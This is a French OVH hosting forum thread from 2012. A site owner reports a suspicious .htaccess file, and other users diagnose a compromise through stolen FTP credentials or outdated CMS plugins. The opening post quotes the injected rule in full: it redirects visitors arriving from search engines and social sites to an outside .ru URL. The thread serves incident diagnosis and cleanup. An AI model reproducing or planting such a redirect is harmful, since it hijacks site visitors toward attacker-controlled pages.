OVH Community, votre nouvel espace communautaire.

Fichier htaccess - Modification étrange


ddavid
07/07/2012, 22h58
Citation Envoyé par cassiopee
et ensuite aller regarder en particulier le fichier des "error".
Et FTP surtout avant "error". Surveiller les lignes indiquant une commande "stor".

Dans "error", il est devenu quasi normal de trouver plein de traces de tentatives, et souvent ça ne mérite même pas de s'y inquiéter...

ddavid
07/07/2012, 22h56
Citation Envoyé par cassiopee
Ce n'est généralement pas le virus/malware qui va se connecter lui-même
en FTP au serveur hébergeant le site web. ça peut bien sûr arriver.
À mon avis, c'est plutôt très souvent : le malware présent sur le PC de la personne habilité à modifier légitimement le site communique avec un malware présent sur une autre machine, qui modifie soit directement le site, soit communique encore le mot de passe...

Faut pas oublier que question malware, c'est souvent la technologie "cloud" puissance 10 (comprendre, ça peut être au moins autant distribué, parfois sophistiqué dans la façon dont c'est contrôlable à distance sans laisser de trace facilement exploitables, mais en plus les botnets peuvent être composés aussi bien de machines classiques que de serveur...).

Si il y a beaucoup de fichiers modifiés en très peu de temps via FTP (pas effacés mais modifiés, et avec quelques secondes de latence au plus entre chaque fichier) alors soit c'est un "pirate" utilisateur de scripts faisant le travail à sa place, soit c'est une machine infestée qui contient un malware capable de faire ça sans la moindre intervention humaine.

cassiopee
05/07/2012, 15h36
il faut aller là : https://logs.ovh.net

(le login/mot de passe est celui permettant d'accéder au manager du site web d'OVH)

et ensuite aller regarder en particulier le fichier des "error".

kass69
05/07/2012, 15h25
merci de votre réponse comment ont fait pour voir le contenu du fichier de logs ?

cassiopee
05/07/2012, 15h07
Non, ça n'a pas vraiment de rapport avec ce dont il est question dans ce topic.

Cf le topic où vous avez écrit deux messages, il y a des pistes à suivre
(regarder le contenu du fichier de logs, etc.)

kass69
05/07/2012, 15h01
Bonjour

probleme similaire je pense mais sur prestashop site hacké

vous pouvez me donner un coup de main svp

le .htaccess infecté + index.php

j'ai tout supprimé site + base de donnée et réinstallé une sauvegarde antérieur

et la j'ai une erreur qui s'affiche ?

Fatal error: Undefined class name 'configuration' in /homez.353/kasspric/www/shop/config/config.inc.php on line 66



merci d'avance

eknyn
03/07/2012, 13h23
Re-Bonjour,

Merci pous vos réponses. Je confirme cela s'est passé via ftp visible dans les logs.
Récupération des -wp-config.php des wordpress + upload de l'.htaccess.

A cheval entre deux postes de travail, je vais tirer au clair la récupération des login/password (antivirus and co) puis réinitialisation tout çà.

Merci de votre aide à tous
Eknyn

Nowwhat
03/07/2012, 12h39
Citation Envoyé par eknyn
0.... mais j'aurai tendance à croire que le hack serait passé par une connexion FTP directe.
Tu trouvera donc des traces dans ton log FTP - t'aura son IP, les fichiers qu'il a touché, etc.

T'as lu http://guides.ovh.net/LogsWeb ?

cassiopee
03/07/2012, 11h40
Citation Envoyé par eknyn
Concernant le virus/malware pourquoi pas mais j'aurai tendance à croire que le hack serait passé par une connexion FTP directe.
Les deux vont ensemble en fait :

Etape 1) le virus/malwware intercepte d'une façon ou d'une autre (*) le login
et le mot de passe FTP et le transmet au pirate.

Etape 2) le pirate se connecte en FTP au serveur hébergeant le site web.

Ce n'est généralement pas le virus/malware qui va se connecter lui-même
en FTP au serveur hébergeant le site web. ça peut bien sûr arriver.

(*) par exemple en allant piocher dans le fichier de configuration du client
FTP, même si ce dernier crypte un peu le mot de passe ; cela peut aussi
se faire en interceptant les saisies au clavier si on retape à chaque connexion
ses identifiants FTP.

eknyn
03/07/2012, 11h34
Merci beaucoup
Cela ne semble pas venir d'une connexion FTP (à la vue des logsà, je vais regarder de plus près du côté de WordPress (vérification des versions, extensions, etc...).
Concernant le virus/malware pourquoi pas mais j'aurai tendance à croire que le hack serait passé par une connexion FTP directe.

Merci pour vos pistes d'investigations, je vais continuer de chercher

cassiopee
03/07/2012, 11h32
Citation Envoyé par Nowwhat
Tout petit détail:
Quand il s'agit de la dernière version, numéroté 1.0.0 (ou nommé 'beta') ou sortie en 2007, voir avant, alors, on ne touche pas à cet 'extension'.

SEULS les plugins/extensions sous développement active - avec un site de support (genre: plus de 2 messages dans leur forum) etc etc sont qualifiés pour être intégré dans votre site.
Oui, au risque d'enfoncer les portes ouvertes : on ne peut mettre à jour
que ce qui a été mis à jour (par le créateur du plugin/addon)

Si le développement du plugin/addon est complètement arrêté, à moins d'être
soi-même programmeur (et d'avoir du temps !), on ne peut pas faire grand
chose.

Ceci dit, le cas le plus fréquent est quand même le plugin/addon non mis
à jour alors qu'il existe des failles et des mises à jour disponibles
(quelque part : heureusement).

Nowwhat
03/07/2012, 11h27
Citation Envoyé par cassiopee
.... il faut
impérativement avoir la toute dernière version sortie. De même pour tous
les plugins/addons/extensions utilisées le cas échéant.
Tout petit détail:
Quand il s'agit de la dernière version, numéroté 1.0.0 (ou nommé 'beta') ou sortie en 2007, voir avant, alors, on ne touche pas à cet 'extension'.

SEULS les plugins/extensions sous développement active - avec un site de support (genre: plus de 2 messages dans leur forum) etc etc sont qualifiés pour être intégré dans votre site.

Le plugin genre "c'est juste ce qu'il me faut" comme seul critère pourrait signer l'arrêt mort de votre site.

SOIT: vous surveiller vous-même la qualité du code PHP/Javascript de chaque plugin.
SOIT: pas touche au plugins/extensions.

cassiopee
03/07/2012, 10h48
C'est malheureusement assez simple : le site web a été piraté

Si l'on utilise un outil de type Joomla, WordPress, SPIP, etc. il faut
impérativement avoir la toute dernière version sortie. De même pour tous
les plugins/addons/extensions utilisées le cas échéant.

Ça peut aussi être d'autre outils du genre galerie d'images (ZenPhoto
par exemple).

Cela peut également venir d'un piratage du mot de passe FTP. Afin de s'en
assurer, il faut aller consulter les logs FTP : https://logs.ovh.net
et vérifier s'il n'y a pas eu de connexion provenant d'adresses IP inconnues.

Si c'est le cas, c'est que le mot de passe FTP a bien été piraté.
Très souvent, c'est du à un malvare/virus/cheval de Troie présent dans le PC
servant à administrer le site web. Il faut utiliser un ou plusieurs anti-virus
successivement afin de s'en assurer.

Voilà déjà quelques premières pistes à creuser

eknyn
03/07/2012, 10h35
Bonjour,

J'ai ce matin un fichier .htaccess à la racine du www de mon hébergement mutualisé sur OVH donc le contenu ne parait pas "normal"

Code:
#c3284d#

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://coppertect.ru/in.cgi?16 [R=301,L]

#/c3284d#
J'ai également une connaissance cliente également OVH dans ce cas (formule perso). Suis-je le seul dans ce cas ?
Mis à part mettre à jour mes mots de passe, y-a-t-il quelque chose d'autre à faire ? ai-je raison de m'inquiéter ?

Merci d'avance et une excellente journée à tous